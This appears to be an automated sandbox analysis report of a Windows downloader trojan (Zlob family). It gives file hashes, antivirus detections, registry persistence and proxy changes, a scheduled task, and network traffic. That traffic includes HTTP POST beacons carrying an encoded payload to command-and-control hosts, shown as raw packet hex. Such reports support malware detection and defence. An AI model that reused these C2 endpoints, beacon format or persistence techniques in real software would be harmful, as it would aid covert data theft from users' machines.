Analysis Date: 2013-09-09 22:45:56
MD5: 6c67e50d0142b5467339de0175d5a5e2
SHA1: 0ee2d963731868cc208f8234604c425291454207

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section CODE — md5: 143887b24a675bf9b5696cdbda4cfabf sha1: 45ca5ae90440cf50b239cc08dfa8650d94058061 size: 14336
Section DATA — md5: c194a432e835a6044bd8f64195dedd80 sha1: 96441945508c20ce5af5bec83f536b2f376e45b5 size: 153600
Section BSS — md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section .idata — md5: 5d6125c1942fedc08b05fad3b72a40f4 sha1: 56b6616a286173925760528c17d6aadb76d223e7 size: 1536
Section .reloc — md5: 8d930bd04fb1cd7050d5d879b6c894c7 sha1: c8032b3935673c32658e750d0da281d3bbda56aa size: 512
Section .rsrc — md5: 30cc794bf22a6385cd1260b4065f240b sha1: c74a7f6734d811236667e3050fe97749bc340ea2 size: 1024
Timestamp: 1992-06-19 22:22:17 (this fixed value is the well-known link timestamp written by Delphi compilers, consistent with the CODE/DATA/BSS section names above; it does not reflect the real build date)
PEhash: e20bd436c3f610692adcc14c14519f40526e78ba
AV clamav: Win.Trojan.Downloader-1280
AV avg: Downloader.Zlob
AV avira: TR/Crypt.XPACK.Gen2

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\CY08W456F0\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CY08W456F0 ➝
C:\malware.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: 119.17.203.37
Winsock DNS: lacvictoria.com
Winsock DNS: qqplot.com

Network Details:

DNS: wsj.com
Type: A
205.203.132.1
DNS: wsj.com
Type: A
205.203.132.65
DNS: wsj.com
Type: A
205.203.140.1
DNS: wsj.com
Type: A
205.203.140.65
DNS: fastclick.com
Type: A
64.156.167.84
DNS: nifty.com
Type: A
210.131.4.217
DNS: qqplot.com
Type: A
109.74.195.149
DNS: bonreligion.com
Type: A
107.20.206.69
DNS: lacvictoria.com
Type: A
DNS: paulo-fg.com
Type: A
HTTP POST: http://qqplot.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POST: http://119.17.203.37/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 109.74.195.149:80
Flows TCP: 192.168.1.1:1032 ➝ 119.17.203.37:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c34304d 79375376   SvxqCiK0l40My7Sv
0x00000110 (00272)   6a7a2b45 6436746b 5a6d417a 39713254   jz+Ed6tkZmAz9q2T
0x00000120 (00288)   6e675151 2f6e5a6c 702f7042 73765a43   ngQQ/nZlp/pBsvZC
0x00000130 (00304)   66463772 69426b47 2f672b37 5643432f   fF7riBkG/g+7VCC/
0x00000140 (00320)   30704562 754f4870 37655263 48506959   0pEbuOHp7eRcHPiY
0x00000150 (00336)   6f393949 4d55756a 67555734 62765449   o99IMUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   492b3555 366e3336 642f3334 6b6f6c56   I+5U6n36d/34kolV
0x00000240 (00576)   31614b51 6e2b513d 3d                  1aKQn+Q==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   3131392e 31372e32 30332e33 370d0a43   119.17.203.37..C
0x000000b0 (00176)   6f6e7465 6e742d4c 656e6774 683a2033   ontent-Length: 3
0x000000c0 (00192)   34310d0a 436f6e6e 65637469 6f6e3a20   41..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 43616368   Keep-Alive..Cach
0x000000e0 (00224)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000f0 (00240)   6368650d 0a0d0a64 6174613d 2f436a45   che....data=/CjE
0x00000100 (00256)   665a4453 76787143 694b306c 34304d79   fZDSvxqCiK0l40My
0x00000110 (00272)   3753766a 7a2b4564 36746b5a 6d417a39   7Svjz+Ed6tkZmAz9
0x00000120 (00288)   7132546e 6751512f 6e5a6c70 2f704273   q2TngQQ/nZlp/pBs
0x00000130 (00304)   765a4366 46377269 426b472f 672b3756   vZCfF7riBkG/g+7V
0x00000140 (00320)   43432f30 70456275 4f487037 65526348   CC/0pEbuOHp7eRcH
0x00000150 (00336)   5069596f 3939494d 55756a67 55573462   PiYo99IMUujgUW4b
0x00000160 (00352)   76544964 4e2f6a50 58754750 6a61427a   vTIdN/jPXuGPjaBz
0x00000170 (00368)   786c6363 356d704e 30316136 742f5169   xlcc5mpN01a6t/Qi
0x00000180 (00384)   53585877 707a3948 6d306b7a 39664266   SXXwpz9Hm0kz9fBf
0x00000190 (00400)   61556e31 30782f47 4c636f66 52694834   aUn10x/GLcofRiH4
0x000001a0 (00416)   4c764673 41694759 46736169 6f4d5730   LvFsAiGYFsaioMW0
0x000001b0 (00432)   374b3045 33726b6b 334d655a 55796744   7K0E3rkk3MeZUygD
0x000001c0 (00448)   654c4777 32733132 2b6f504d 4e726e4a   eLGw2s12+oPMNrnJ
0x000001d0 (00464)   5a637a68 7a5a3878 694e5775 3554674f   ZczhzZ8xiNWu5TgO
0x000001e0 (00480)   6871344f 71555330 424d5464 4b32625a   hq4OqUS0BMTdK2bZ
0x000001f0 (00496)   792f6878 33546e6d 47795446 4c48684c   y/hx3TnmGyTFLHhL
0x00000200 (00512)   6352662b 76417a49 4f424e6d 76343343   cRf+vAzIOBNmv43C
0x00000210 (00528)   444b3251 30354156 636d4138 324b6854   DK2Q05AVcmA82KhT
0x00000220 (00544)   66557373 2f476f6c 77786c6d 396b4c6e   fUss/Golwxlm9kLn
0x00000230 (00560)   726e6c49 2b355536 6e333664 2f33346b   rnlI+5U6n36d/34k
0x00000240 (00576)   6f6c5631 614b516e 2b513d3d            olV1aKQn+Q==


Strings